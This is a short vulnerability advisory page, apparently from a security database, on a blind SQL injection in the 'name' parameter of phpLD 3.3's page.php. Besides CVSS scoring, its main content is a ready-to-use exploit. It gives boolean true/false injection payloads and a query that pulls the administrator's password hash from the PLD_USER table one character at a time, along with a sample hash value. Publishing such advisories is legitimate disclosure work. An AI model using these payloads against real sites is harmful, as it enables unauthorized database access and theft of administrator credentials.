phpLD 3.3 (page.php name) Blind SQL Injection Vulnerability

2009.07.12
Credit: nukeit
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

phpLD 3.3 Blind SQL Injection http://www.phplinkdirectory.com/ magic_quotes_gpc = Off register_globals = On Vulnerable: GET http://site/phpld/page.php?name= True Request: (validpagename)' or 1=1# False Request: (validpagename)' or 1=0# Try this (urlencode): (validpagename)' or ORD(MID((SELECT PASSWORD FROM PLD_USER WHERE ID = 1),1,1))>1# etc... Field value example: {sha1}dd94709528bb1c83d08f3088d4043f4742891f4f - Seasons Greetings - - http://nukeit.org -


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top